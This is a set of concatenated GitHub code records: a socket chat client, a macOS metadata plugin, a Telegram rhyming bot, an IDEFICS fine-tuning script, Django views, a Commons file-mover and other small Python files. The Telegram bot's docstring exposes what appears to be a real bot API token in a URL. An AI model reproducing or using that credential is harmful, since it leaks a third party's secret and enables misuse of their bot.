self.__socket.recv(1024).decode()\r\n obj = json.loads(buffer)\r\n m=''\r\n\r\n if ((obj['number_message'] > 0 or obj['bo'] == True) and obj['po']==False):\r\n print('public message from '+str(obj['sender_nickname'])+',length='+str(obj['number_message'])+'\\r\\n'+obj['message'])\r\n elif obj['number_message'] > 0 and obj['bo']==False and obj['po']==True:\r\n for i in obj['list_mem']:\r\n m+=str(i)+', '\r\n private_message='private message, length='+str(obj['number_message'])+' from '+ str(obj['sender_nickname'])+' to '+ m + ':\\r\\n'+str(obj['message'])\r\n print(private_message)\r\n else:\r\n print(obj['message'])\r\n\r\n except Exception:\r\n print('[Client] has error')\r\n\r\n def __send_message_thread(self, message,bo,number_message,list_mem,po=False):\r\n \"\"\"\r\n :param message\r\n \"\"\"\r\n self.__socket.send(json.dumps({\r\n 'type': 'broadcast',\r\n 'bo':bo,\r\n 'po':po,\r\n 'list_mem':list_mem,\r\n 'number_message':number_message,\r\n 'sender_id': self.__id,\r\n 'message': message\r\n }).encode())\r\n\r\n def start(self):\r\n \"\"\"\r\n Start the client\r\n \"\"\"\r\n self.__socket.connect(('127.0.0.1', 8888))\r\n self.cmdloop()\r\n\r\n def do_Bye(self,args):\r\n self.__socket.send(json.dumps({\r\n 'type': 'Bye',\r\n 'nickname': self.__nickname,\r\n 'id':self.__id\r\n }).encode())\r\n\r\n\r\n\r\n\r\n def do_Hello(self, args):\r\n \"\"\"\r\n :param args\r\n \"\"\"\r\n nickname = args.split(' ')[0]\r\n\r\n # Send the nickname to the server to get the user id\r\n self.__socket.send(json.dumps({\r\n 'type': 'Hello',\r\n 'nickname': nickname\r\n }).encode())\r\n # Try to accept data\r\n # noinspection PyBroadException\r\n\r\n try:\r\n buffer = self.__socket.recv(1024).decode()\r\n obj = json.loads(buffer)\r\n if obj['id']:\r\n self.__nickname = nickname\r\n self.__id = obj['id']\r\n\r\n # Open the child thread for receiving data\r\n thread = threading.Thread(target=self.__receive_message_thread)\r\n thread.setDaemon(True)\r\n thread.start()\r\n print('Hi ' + str(nickname) + ' welcome to the chat room')\r\n else:\r\n 
print('[Client] Can not log in to chat room')\r\n except Exception:\r\n print('[Client] Unable to get data from the server')\r\n\r\n def do_send(self, args):\r\n \"\"\"\r\n :param args\r\n \"\"\"\r\n message = args\r\n last=len(message)-1\r\n number = ''\r\n number_message=0\r\n lines=[]\r\n bo=False\r\n po=False\r\n number2=0\r\n member_private=''\r\n list_mem=[]\r\n\r\n if message =='please send the list of attendees':\r\n bo=False\r\n elif message[last]==':' and message[22]=='=':\r\n bo=True\r\n for i in range(len(message)):\r\n if i>=23 and i0:\r\n line=input()\r\n if line and number_message> 0:\r\n number_message=number_message - len(line)\r\n lines.append(line)\r\n else:\r\n break\r\n message='\\n'.join(lines)\r\n elif message[last]==':' and message[23]=='=':\r\n bo = False\r\n po=True\r\n to=int(message.index('to'))-1\r\n for i in range(len(message)):\r\n if i >= 24 and i < to:\r\n number += message[i]\r\n\r\n number_message = int(number)\r\n number2 = int(number)\r\n for i in range(len(message)):\r\n if i > to+3 and i < last:\r\n member_private += message[i]\r\n\r\n\r\n list_mem=member_private.split(',')\r\n\r\n while number_message > 0:\r\n line = input()\r\n if line and number_message > 0:\r\n number_message = number_message - len(line)\r\n lines.append(line)\r\n else:\r\n break\r\n message = '\\n'.join(lines)\r\n\r\n else:\r\n bo=True\r\n\r\n\r\n # Open the child thread for sending data\r\n thread = threading.Thread(target=self.__send_message_thread, args=(message,bo,number2,list_mem,po ))\r\n thread.setDaemon(True)\r\n thread.start()\r\n\r\n def do_help(self, arg):\r\n \"\"\"\r\n :param arg\r\n \"\"\"\r\n command = arg.split(' ')[0]\r\n if command == '':\r\n print('[Help] Hello nickname - Log in to the chat room, nickname is your chosen nickname')\r\n print('you can write <> for login in to chat room ')\r\n print('and <> send message for users\\nand <> for left the chat room')\r\n elif command == 'Hello':\r\n print('[Help] Hello nickname -Log in to the chat room, nickname is your chosen nickname')\r\n elif command == 'send':\r\n print('[Help] send message - send public or private message for user')\r\n print('for public message you should write <:\\n')\r\n print('for private message you should write < to ,,...:')\r\n print('for show you member list you should write <>')\r\n else:\r\n print('[Help] Did not find the instruction you want to know')\r\n","repo_name":"mehran1421/python-library","sub_path":"it_proj/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":6510,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"42270575307","text":"\"\"\"exiftool template plugin for autofile\"\"\"\n\nfrom __future__ import annotations\n\nimport datetime\nfrom typing import Iterable\n\nimport mdinfo\nimport osxmetadata\nfrom osxmetadata import (\n MDIMPORTER_ATTRIBUTE_DATA,\n MDITEM_ATTRIBUTE_DATA,\n NSURL_RESOURCE_KEY_DATA,\n _kFinderColor,\n _kFinderInfo,\n _kFinderStationeryPad,\n _kMDItemUserTags,\n)\n\nALL_ATTRIBUTES = {\n *list(MDITEM_ATTRIBUTE_DATA.keys()),\n *list(NSURL_RESOURCE_KEY_DATA.keys()),\n *list(MDIMPORTER_ATTRIBUTE_DATA.keys()),\n _kFinderColor,\n _kFinderInfo,\n _kFinderStationeryPad,\n _kMDItemUserTags,\n}\n\nFIELDS = {\"{mac}\": \"Format: '{mac:SUBFIELD}'\"}\n\nDATETIME_ATTRIBUTES = {\n \"date\": \"ISO date, e.g. 2020-03-22\",\n \"year\": \"4-digit year, e.g. 2021\",\n \"yy\": \"2-digit year, e.g. 21\",\n \"month\": \"Month name as locale's full name, e.g. 
December\",\n \"mon\": \"Month as locale's abbreviated name, e.g. Dec\",\n \"mm\": \"2-digit month, e.g. 12\",\n \"dd\": \"2-digit day of the month, e.g. 22\",\n \"dow\": \"Day of the week as locale's full name, e.g. Tuesday\",\n \"doy\": \"Julian day of year starting from 001\",\n \"hour\": \"2-digit hour, e.g. 10\",\n \"min\": \"2-digit minute, e.g. 15\",\n \"sec\": \"2-digit second, e.g. 30\",\n \"strftime\": \"Apply strftime template to date/time. Should be used in form \"\n + \"{created.strftime,TEMPLATE} where TEMPLATE is a valid strftime template, e.g. \"\n + \"{created.strftime,%Y-%U} would result in year-week number of year: '2020-23'. \"\n + \"If used with no template will return null value. \"\n + \"See https://strftime.org/ for help on strftime templates.\",\n}\n\nDATETIME_SUBFIELDS = list(DATETIME_ATTRIBUTES.keys())\n\n\n@mdinfo.hookimpl\ndef get_template_help() -> Iterable:\n \"\"\"Specify help text for your plugin; will get displayed with mdinfo --help\n Returns:\n Iterable (e.g. list) of help text as str or list of lists\n str items may be formatted with markdown\n list of lists items can be used for definition lists (e.g. [[key1, value1], [key2, value2]])\n \"\"\"\n\n text = \"\"\"\n The `{mac}` template provides access to a wide range of macOS specific metadata fields\n including all Spotlight metadata fields. \n\n The following attributes are supported:\n\n \"\"\"\n\n text += \", \".join(sorted(ALL_ATTRIBUTES))\n text += \"\\n\"\n\n fields = [[\"Field\", \"Description\"], *[[k, v] for k, v in FIELDS.items()]]\n # attributes = [\n # [\"Attribute\", \"Description\"],\n # *[[k, v] for k, v in DATETIME_ATTRIBUTES.items()],\n # ]\n # return [\"**MacOS Specific Metadata**\", fields, text, attributes]\n return [\"**MacOS Specific Metadata**\", fields, text]\n\n\n@mdinfo.hookimpl\ndef get_template_value(\n filepath: str, field: str, subfield: str, default: list[str]\n) -> list[str | None] | None:\n \"\"\"Lookup value for {mac} template field.\n\n Args:\n filepath: path to the file being processed\n field: template field to find value for\n subfield: the subfield provided, if any (e.g. {field:subfield})\n field_arg: the field argument provided, if any (e.g. {field(arg)})\n default: the default value provided to the template, if any (e.g. {field,default})\n\n Returns:\n The matching template value (which may be None) as a list or None if template field is not handled.\n\n Raises:\n ValueError: if the template is not correctly formatted (e.g. 
plugin expected a subfield but none provided)\n \"\"\"\n if \"{\" + field + \"}\" not in FIELDS:\n return None\n\n if subfield not in ALL_ATTRIBUTES:\n raise ValueError(f\"Invalid subfield '{subfield}' for {field} template\")\n\n metadata = osxmetadata.OSXMetaData(filepath)\n value = metadata.get(subfield)\n if not isinstance(value, list):\n value = [value]\n value = [str(v) for v in value]\n return value\n","repo_name":"RhetTbull/mdinfo_macos","sub_path":"mdinfo_macos/mdinfo_mac.py","file_name":"mdinfo_mac.py","file_ext":"py","file_size_in_byte":3806,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"14722925522","text":"# basic telegram bot\n# https://www.codementor.io/garethdwyer/building-a-telegram-bot-using-python-part-1-goi5fncay\n# https://github.com/sixhobbits/python-telegram-tutorial/blob/master/part1/echobot.py\n\nimport json\nimport requests\nimport time\nimport urllib\nimport random\nfrom DBhelper import DBHelper\nimport numpy as np\nfrom config import TOKEN\n\nURL = \"https://api.telegram.org/bot{}/\".format(TOKEN)\ndb = DBHelper()\n\n\"\"\"\nUseful commands:\nlink to bot: https://api.telegram.org/bot556283248:AAGId4tLael98vEfBuJoW1DviS5Pv2bIi2Q/getme\nHow to get the last text message:\nprint(get_last_chat_id_and_text(updates)[0])\nUseful information:\nThe Dictionary has 268973 entries.\n\"\"\"\n\n\ndef get_url(url):\n response = requests.get(url)\n content = response.content.decode(\"utf8\")\n return content\n\n\ndef get_json_from_url(url):\n content = get_url(url)\n js = json.loads(content)\n return js\n\n\ndef get_updates(offset=None):\n url = URL + \"getUpdates?timeout=100\"\n if offset:\n url += \"&offset={}\".format(offset)\n js = get_json_from_url(url)\n return js\n\n\ndef get_last_update_id(updates):\n update_ids = []\n for update in updates[\"result\"]:\n update_ids.append(int(update[\"update_id\"]))\n return max(update_ids)\n\n\ndef clean_word(word):\n letters = ['A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z']\n new_word = \"\"\n for c in word:\n if c in letters:\n new_word += c\n return new_word\n\n\ndef simple_rhyme(updates, word_list):\n for update in updates[\"result\"]:\n try:\n chat = update[\"message\"][\"chat\"][\"id\"]\n message = \"\"\n for word in word_list:\n word = word.upper()\n word = clean_word(word)\n rhyme_words, phonemes = db.get_items(\"rhymes\")\n if word in rhyme_words:\n print(\"thinking\")\n ph = phonemes[rhyme_words.index(word)].split(\" \")\n rhymes = {}\n for index, rhyme in enumerate(rhyme_words):\n ph2 = phonemes[index].split(\" \")\n score = 1\n minimum = min(len(ph), len(ph2))\n for i in range(1, 1 + minimum):\n if ph[-i] == ph2[-i]:\n score *= minimum - i + 1\n if score >= 2:\n rhymes[rhyme] = score\n # print(best_score, best_index)\n max_score = max(rhymes.values())\n rhymes_string = [word for word in rhymes if rhymes[word] == max_score]\n message += rhymes_string[random.randint(0,len(rhymes_string)-1)] + \" \"\n else:\n message = \"Yo what does dis mean? \"\n print(message)\n send_message(message.lower(), chat)\n\n except KeyError:\n pass\n\n\ndef handle_updates(updates, rapper = \"kanye\"):\n for update in updates[\"result\"]:\n try:\n text = update[\"message\"][\"text\"]\n # make the text all capital letters, bc in our db they are all capital\n text = text.upper()\n # we are only interested in the last word:\n text = text.split(\" \")[-1]\n # clean that word (i.e. 
remove non letters)\n text = clean_word(text)\n print(\"Text:\", text)\n chat = update[\"message\"][\"chat\"][\"id\"]\n words, phonemes = db.get_items(\"rhymes\")\n\n # if we have a phoneme composition of the word, use that for further work. Else, send an error message\n if text in words:\n print(\"thinking\")\n ph = phonemes[words.index(text)].split(\" \")\n # in ph are the phonemes of the input word, now we want to find a word with similar phonemes:\n best_index = 0\n best_score = 1\n rhymes = {}\n for index, word in enumerate(words):\n ph2 = phonemes[index].split(\" \")\n score = 1\n minimum = min(len(ph), len(ph2))\n for i in range(1, 1+minimum):\n if ph[-i] == ph2[-i]:\n score *= minimum - i + 1\n if score >= 2:\n rhymes[word] = score\n\n # print(best_score, best_index)\n max_score = max(rhymes.values())\n rhymes_string = [word for word in rhymes if rhymes[word] == max_score]\n # look if some word in rhymes_string matches the vocabulary of the rapper\n if rapper == \"kanye\":\n row, kanye_words = db.get_items(\"kanye\")\n kanye_words = np.random.permutation(kanye_words)\n target_word = \"\"\n for kanye_word in kanye_words:\n if kanye_word.upper() in rhymes_string:\n kanye_lyrics = open(\"KanyeWest.txt\", 'r', encoding='UTF-8').readlines()\n row_index = db.get_index(\"kanye\", kanye_word)[0]\n message = kanye_lyrics[row_index : row_index+5]\n print(message)\n send_message(\"\".join(message), chat)\n return\n out = []\n # for i in range(5):\n # out.append(rhymes_string[random.randint(0, len(rhymes_string)-1)])\n\n# send_message(\"\\n\".join(out), chat)\n elif rapper == \"eminem\":\n row, eminem_words = db.get_items(\"eminem\")\n eminem_words = np.random.permutation(eminem_words)\n target_word = \"\"\n for eminem_word in eminem_words:\n if eminem_word.upper() in rhymes_string:\n eminem_lyrics = open(\"Eminem.txt\", 'r', encoding='ISO-8859-1').readlines()\n row_index = db.get_index(\"eminem\", eminem_word)[0]\n message = eminem_lyrics[row_index: row_index + 5]\n print(message)\n send_message(\"\".join(message), chat)\n return\n\n send_message(rapper + \" does not rhyme to that word.\", chat)\n else:\n print(\"not in db\")\n message = \"Yo, what doz that mean?\"\n send_message(message, chat)\n return\n\n except KeyError:\n pass\n\n\ndef show_statistics(updates):\n for update in updates[\"result\"]:\n stats = {}\n try:\n text = update[\"message\"][\"text\"]\n chat = update[\"message\"][\"chat\"][\"id\"]\n ids, texts = db.get_items()\n for text in texts[0:10]:\n words = text.split(\" \")\n for word in words:\n if word in stats:\n stats[word] += 1\n else:\n stats[word] = 1\n message = \"\"\n for word in stats:\n message += word + \": \" + str(stats[word]) + \"\\n\"\n send_message(message, chat)\n except KeyError:\n pass\n\n\ndef get_last_chat_id_and_text(updates):\n num_updates = len(updates[\"result\"])\n last_update = num_updates - 1\n if \"text\" not in updates[\"result\"][last_update][\"message\"]:\n return (\"\", 0)\n text = updates[\"result\"][last_update][\"message\"][\"text\"]\n chat_id = updates[\"result\"][last_update][\"message\"][\"chat\"][\"id\"]\n return (text, chat_id)\n\n\ndef send_message(text, chat_id):\n text = urllib.parse.quote_plus(text)\n url = URL + \"sendMessage?text={}&chat_id={}\".format(text, chat_id)\n get_url(url)\n\n\ndef main():\n db.setup()\n last_update_id = None\n rapper = \"kanye\"\n start = True\n while True:\n updates = get_updates(last_update_id)\n\n if len(updates[\"result\"]) > 0:\n last_update_id = get_last_update_id(updates) + 1\n [text, chat_id] = 
get_last_chat_id_and_text(updates)\n if start:\n msg = \"Yo, my name is Rap God. Im a Chat Bot.\\nI am the best, let's give it a test!\\nYou wanna know what I can do, type !help and I can tell you!\"\n send_message(msg, chat_id)\n start = False\n elif text == \"!help\":\n msg = \"I can imitate rappers. Write somethning and I will rap to that.\\n\\n!Kanye makes me imitate Kanye West\\n!Eminem makes me imitate Eminem\\n\\nIf you just want to know a rhyme, type \\n\\n !rhyme *word* and I will give you a rhyme to every word!\\n\\nType !Goodbye to let me know you are leaving.\"\n send_message(msg, chat_id)\n elif text == \"!Goodbye\":\n msg = \"Smell ya later, alligator!\"\n send_message(msg, chat_id)\n return\n elif text == \"!Eminem\":\n rapper = \"eminem\"\n elif text == \"!Kanye\":\n rapper = \"kanye\"\n elif \"!rhyme\" in text:\n words = text.split(\" \")\n words.remove(\"!rhyme\")\n simple_rhyme(updates, words)\n else:\n handle_updates(updates, rapper)\n time.sleep(0.5)\n\n\nif __name__ == '__main__':\n main()\n # print(iesha.iesha_chat())\n # iesha.demo()","repo_name":"STrucks/Chat_Bot","sub_path":"telegram.py","file_name":"telegram.py","file_ext":"py","file_size_in_byte":9490,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"365343671","text":"# adapted from https://github.com/huggingface/notebooks/blob/main/transformers_doc/en/pytorch/image_captioning.ipynb\n\n# This example demonstrates normal finetuning (w/o peft) - for the sake of keeping the memory\n# requirements small it freezes the original pre-trained text and image layers to keep the memory\n# requirements to just 40GB. If you have multiple GPUs then you can remove the unfreeze part to\n# finetune the whole model. Alternatively use the PEFT solution as shown in\n# IDEFICS_finetuning_demo.ipynb notebook which requires only 20GB to finetune the whole model.\n\nimport torch\nimport torchvision.transforms as transforms\n\nfrom datasets import load_dataset\nfrom PIL import Image\nfrom transformers import IdeficsForVisionText2Text, AutoProcessor, Trainer, TrainingArguments\n\ndevice = \"cuda\" if torch.cuda.is_available() else \"cpu\"\n\ncheckpoint = \"HuggingFaceM4/idefics-9b\"\n# checkpoint = \"HuggingFaceM4/tiny-random-idefics\"\n\nprocessor = AutoProcessor.from_pretrained(checkpoint)\nmodel = IdeficsForVisionText2Text.from_pretrained(checkpoint, torch_dtype=torch.bfloat16).to(device)\n\n# freeze the original text and vision models and finetune only the layers added by IDEFICS\n# you can unfreeze the whole model, but it'll require multiple gpus to finetune\nmodel.model.freeze_text_layers()\nmodel.model.freeze_vision_layers()\n\n# help util\ndef check_inference():\n url = \"https://huggingface.co/datasets/sayakpaul/sample-datasets/resolve/main/pokemon.png\"\n prompts = [\n url,\n \"Question: What's on the picture? 
Answer:\",\n ]\n\n inputs = processor(prompts, return_tensors=\"pt\").to(device)\n generated_ids = model.generate(**inputs, max_length=150)\n generated_text = processor.batch_decode(generated_ids, skip_special_tokens=True)[0]\n print(generated_text)\n\n# check generation before finetuning\ncheck_inference()\n# well, actually it looks like the model is already aware of pokemon - but this dataset will refine it further\n\n# finetune the model on the pokemon types dataset\nds = load_dataset(\"GabeHD/pokemon-type-captions\")\nds = ds[\"train\"].train_test_split(test_size=0.1)\ntrain_ds = ds[\"train\"]\neval_ds = ds[\"test\"]\n\ndef convert_to_rgb(image):\n # `image.convert(\"RGB\")` would only work for .jpg images, as it creates a wrong background\n # for transparent images. The call to `alpha_composite` handles this case\n if image.mode == \"RGB\":\n return image\n\n image_rgba = image.convert(\"RGBA\")\n background = Image.new(\"RGBA\", image_rgba.size, (255, 255, 255))\n alpha_composite = Image.alpha_composite(background, image_rgba)\n alpha_composite = alpha_composite.convert(\"RGB\")\n return alpha_composite\n\ndef ds_transforms(example_batch):\n image_size = processor.image_processor.image_size\n image_mean = processor.image_processor.image_mean\n image_std = processor.image_processor.image_std\n\n image_transform = transforms.Compose([\n convert_to_rgb,\n transforms.RandomResizedCrop((image_size, image_size), scale=(0.9, 1.0), interpolation=transforms.InterpolationMode.BICUBIC),\n transforms.ToTensor(),\n transforms.Normalize(mean=image_mean, std=image_std),\n ])\n\n prompts = []\n for i in range(len(example_batch)):\n prompts.append(\n [\n example_batch[\"image\"][i],\n f\"Question: What's on the picture? Answer: {example_batch['text'][i]}\\n\",\n ],\n )\n\n inputs = processor(prompts, transform=image_transform, return_tensors=\"pt\").to(device)\n\n inputs[\"labels\"] = inputs[\"input_ids\"]\n\n return inputs\n\ntrain_ds.set_transform(ds_transforms)\neval_ds.set_transform(ds_transforms)\n\nmodel_name = checkpoint.split(\"/\")[1]\n\n# this setup requires about 40GB of gpu memory\ntraining_args = TrainingArguments(\n output_dir=f\"{model_name}-pokemon\",\n learning_rate=5e-6,\n num_train_epochs=10,\n bf16=True,\n per_device_train_batch_size=32,\n per_device_eval_batch_size=32,\n gradient_accumulation_steps=2,\n dataloader_pin_memory=False,\n save_total_limit=3,\n evaluation_strategy=\"steps\",\n save_strategy=\"steps\",\n save_steps=1000, # don't save until ready...\n eval_steps=40,\n logging_steps=40,\n remove_unused_columns=False,\n push_to_hub=False,\n label_names=[\"labels\"],\n load_best_model_at_end=True,\n report_to=None,\n)\n\ntrainer = Trainer(\n model=model,\n args=training_args,\n train_dataset=train_ds,\n eval_dataset=eval_ds,\n)\n\ntrainer.train()\n\n# check generation again after finetuning\ncheck_inference()\n\n# after finetuning ideally we want generate to produce something like: a drawing of a pink and blue pokemon\n","repo_name":"huggingface/notebooks","sub_path":"examples/idefics/finetune_image_captioning.py","file_name":"finetune_image_captioning.py","file_ext":"py","file_size_in_byte":4621,"program_lang":"python","lang":"en","doc_type":"code","stars":2864,"dataset":"github-code","pt":"53"} +{"seq_id":"16565252722","text":"'''\r\n@author: codork\r\n@date: 05-05-2020\r\n@problem: Given a string, find the first non-repeating character in it and return it's index. 
If it doesn't exist, return -1.\r\n'''\r\nclass Solution:\r\n def firstUniqChar(self, s: str) -> int:\r\n string = list(s)\r\n while(string):\r\n char = string.pop(0)\r\n if char in string:\r\n string = list(filter(lambda a: a != char, string))\r\n else:\r\n return s.index(char)\r\n if len(string) == 0:\r\n return -1\r\n","repo_name":"codork/competitive-coding","sub_path":"5_FirstUniqueChar.py","file_name":"5_FirstUniqueChar.py","file_ext":"py","file_size_in_byte":529,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"39037711719","text":"from django.shortcuts import render, redirect\nfrom apps.libro.form import LibroForm\nfrom apps.libro.models import Libro\n\ndef listLibros(request):\n libros = Libro.objects.all().order_by('-id')\n context = {'libros': libros}\n return render(request, 'libro/listlibro.html',context)\n\ndef home(request):\n return render(request, 'base/base.html')\n\ndef libroCreate(request):\n if request.method == 'POST':\n form = LibroForm(request.POST)\n if form.is_valid():\n form.save()\n return redirect('libro:listlibros')\n else:\n form = LibroForm()\n return render(request, 'libro/libro_form.html', {'form': form})\n\ndef libroUpdate(request, id_libro):\n mant = Libro.objects.get(pk=id_libro)\n\n if request.method == 'GET':\n form = LibroForm(instance=mant)\n else:\n form = LibroForm(request.POST, instance=mant)\n if form.is_valid():\n form.save()\n return redirect('libro:listlibros')\n \n return render(request, 'libro/libro_form.html', {'form': form})\n\ndef libroDelete(request, id_libro):\n mant = Libro.objects.get(pk=id_libro)\n if request.method == 'POST':\n mant.delete()\n return redirect('libro:listlibros')\n return render(request, 'libro/libroDelete.html', {'libro': mant})","repo_name":"ACAMARGO97/taller_3corte","sub_path":"apps/libro/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1282,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"16115452341","text":"import pandas as pd\nfrom copy import deepcopy\nfrom visrec.src.Transform import Data2Schema, Schema2Asp\nimport itertools\n\n\ndef data_to_asp(data: pd.DataFrame, ColumnTypes: dict = {}):\n return Schema2Asp(Data2Schema(data, ColumnTypes))\n\ndef GetFields(Recos):\n res = deepcopy(Recos)\n for item in res:\n Match = set()\n d = {}\n for encode in item.props['layer']:\n d.update(encode['encoding'])\n keys = d.keys()\n for key in keys:\n # if d[key].__contains__('field') and not d[key]['field'] in Match:\n # Match.append(d[key]['field'])\n if d[key].__contains__('field'):\n Match.add(d[key]['field'])\n item.fields = Match\n return res\n\n\ndef PrintVegaLite(Recos):\n index = 1\n for ans in Recos:\n print(\"index:%d\" % (index))\n print(\"Vega-Lite:\", ans.props)\n # print(\"Asp:\", ans.Ops)\n print(\"Fields:\", ans.fields)\n # print(\"TaskCount:\", ans.count)\n # print(\"Tasks:\", ans.task)\n print(\"Cost:\", ans.cost)\n print(\"----------------------------\")\n index += 1\n\n\ndef GetIters(lst):\n combs = []\n for i in range(1, len(lst)+1):\n els = [list(x) for x in itertools.combinations(lst, i)]\n combs.extend(els)\n return combs\n\n\ndef DeleteIter(column, Recos):\n columns = GetIters(sorted(column))\n NewRecos = []\n for item in Recos:\n if not sorted(list(item.fields)) in columns:\n NewRecos.append(item)\n return NewRecos\n\n\ndef GetUniqueFields(Recos):\n deRecos = []\n field = []\n taskcount = []\n # cost=[]\n for item in Recos:\n if not item.fields in field:\n 
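# first time this exact field combination shows up: remember it and\n            # keep this reco as the representative for that combination\n            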
field.append(item.fields)\n taskcount.append(item.count)\n # cost.append(item.cost)\n deRecos.append(item)\n # return deRecos,field,taskcount\n return deRecos\n\ndef DeLayer(props):\n if len(props[\"layer\"])<2:\n props.update(props.pop(\"layer\")[0])\n return props\n return props\n\ndef word2vec(word):\n from collections import Counter\n from math import sqrt\n # count the characters in word\n cw = Counter(word)\n # precomputes a set of the different characters\n sw = set(cw)\n # precomputes the \"length\" of the word vector\n lw = sqrt(sum(c*c for c in cw.values()))\n # return a tuple\n return cw, sw, lw\n\ndef cosdis(v1, v2):\n # which characters are common to the two words?\n common = v1[1].intersection(v2[1])\n # by definition of cosine distance we have\n return sum(v1[0][ch]*v2[0][ch] for ch in common)/v1[2]/v2[2]\n\n# def read_data_to_asp(file: str, ColumnTypes: dict = {}):\n# header = list(ColumnTypes.keys())\n# if file.endswith(\".json\"):\n# with open(file) as f:\n# data = json.load(f)\n# data = pd.DataFrame(data)\n# data = data[header]\n# df = data.where((pd.notnull(data)), None)\n# df = list(df.T.to_dict().values())\n# return Schema2Asp(Data2Schema(data, ColumnTypes)[0],Data2Schema(data, ColumnTypes)[1]), df\n# elif file.endswith(\".csv\"):\n# data = pd.read_csv(file, encoding='utf-8')\n# data = data[header]\n# df = data.where((pd.notnull(data)), None)\n# df = list(df.T.to_dict().values())\n# schema = Data2Schema(data, ColumnTypes)\n# asp = Schema2Asp(schema,ColumnTypes)\n# return asp, df\n# else:\n# raise Exception(\"invalid file type\")\n\n# def GetUniqueFields2(Recos):\n# deRecos=[]\n# field=[]\n# taskcount=[]\n# field_task=[]\n# for item in Recos:\n# temp=list(item.fields)+list(item.task)\n# if not temp in field_task:\n# field_task.append(temp)\n# field.append(item.fields)\n# taskcount.append(item.count)\n# # cost.append(item.cost)\n# deRecos.append(item)\n# return deRecos,field,taskcount\n\n# def getTempCost(fields,maxtasks,Column):\n# taskscount=0\n# if Column in fields:\n# taskscount+=maxtasks[fields.index(Column)]\n# return taskscount\n","repo_name":"ShenLeixian/TaskVis","sub_path":"backend/visrec/src/helper.py","file_name":"helper.py","file_ext":"py","file_size_in_byte":4070,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"18051582531","text":"#! 
/usr/bin/env python3\n# Script to move Fae IA imports\nimport argparse\nimport logging\n\nimport os\n\nimport pywikibot\nfrom pywikibot import textlib\n\nPREFIX = \"Hardwicke's Science-Gossip\"\nDATA = [\n    (\"https://www.archive.org/download/hardwickesscienc291893\", \"Volume 29\"),\n]\nREASON = \"Move to include volume number instead of IA ID\"\nCATS = [\n    \"Hardwicke's Science-Gossip\"\n]\n\n# DATA = [\n#     (\"https://www.archive.org/download/hardwickesscienc{v:02}cook\".format(v=i),\n#      \"Volume {v}\".format(v=i))\n#     for i in range(25, 30)\n# ]\n\n\ndef main():\n\n\n    parser = argparse.ArgumentParser(description='')\n    parser.add_argument('-v', '--verbose', action='store_true',\n                        help='show debugging information')\n    parser.add_argument('-n', '--dry-run', action='store_true',\n                        help='')\n\n    args = parser.parse_args()\n\n    log_level = logging.DEBUG if args.verbose else logging.INFO\n    logging.basicConfig(level=log_level)\n\n\n    com_site = pywikibot.Site(\"commons\", \"commons\")\n\n\n    for d in DATA:\n\n        ia_id = d[0].split(\"/\")[-1]\n\n        print(ia_id)\n\n        pages = []\n\n        for res in com_site.search(\"\\\"(IA {})\\\"\".format(ia_id)):\n\n            if \"(IA {})\".format(ia_id) in res.title():\n                pages.append(res)\n\n        if len(pages) != 1:\n            raise RuntimeError(\"Didn't find a single page, found {}\".format(len(pages)))\n\n        page = pages[0]\n\n        print(page.title())\n\n        _, ext = os.path.splitext(page.title())\n        new_title = \"File:\" + PREFIX + \" - \" + d[1] + ext\n\n        text = page.text\n        cats = textlib.getCategoryLinks(\n            text, page.site)\n\n        new_cats = []\n        for cat in CATS:\n\n            catpl = pywikibot.Category(page.site, cat)\n\n            if catpl in cats:\n                pywikibot.output('{} is already in {}.'\n                                 .format(page.title(), catpl.title()))\n                continue\n\n            pywikibot.output('Adding %s' % catpl.title(as_link=True, allow_interwiki=False))\n\n            new_cats.append(catpl)\n\n        if len(new_cats) > 0:\n\n            cats += new_cats\n\n            text = textlib.replaceCategoryLinks(\n                text, cats, site=page.site)\n\n            if not args.dry_run:\n                page.put(text, summary=\"Add categories: \" + \", \".join(\n                    [c.title(as_link=True, allow_interwiki=False) for c in new_cats]))\n\n        if not args.dry_run:\n            page.move(new_title,\n                      reason=REASON)\n\n        print(cats)\n\nif __name__ == \"__main__\":\n    main()","repo_name":"inductiveload/wstools","sub_path":"wstools/commons_ia_mover.py","file_name":"commons_ia_mover.py","file_ext":"py","file_size_in_byte":2586,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"18324523423","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @File : test_suite.py\n# @Author: Lizi\n# @Date : 2020/11/2\n\n\nimport unittest\nfrom unittest_testcase import Math_testcase as testcase\nfrom BeautifulReport import BeautifulReport\n# from .unittest_testcase import Math_testcase as testcase\n\nif __name__ == '__main__':\n    suite = unittest.TestSuite()\n    # tests = [testcase('setUp'), testcase('tearDown'), testcase('test_add_init'),testcase('test_sub_int'),\n    #          testcase('test_sub_float'),testcase('test_sub_float2'), testcase('test_multi_list'),\n    #          testcase('test_multi_str'), testcase('test_div_int'),testcase('test_div_float'),\n    #          testcase('test_div_float2'),testcase('test_div_exception')]\n    # loadTestsFromTestCase expects the TestCase class itself, not a string\n    tests = unittest.TestLoader().loadTestsFromTestCase(testcase)\n    suite.addTests(tests)\n    with open('test_report', 'w') as file:\n        runner = unittest.TextTestRunner(stream=file, descriptions=True, verbosity=2)\n        
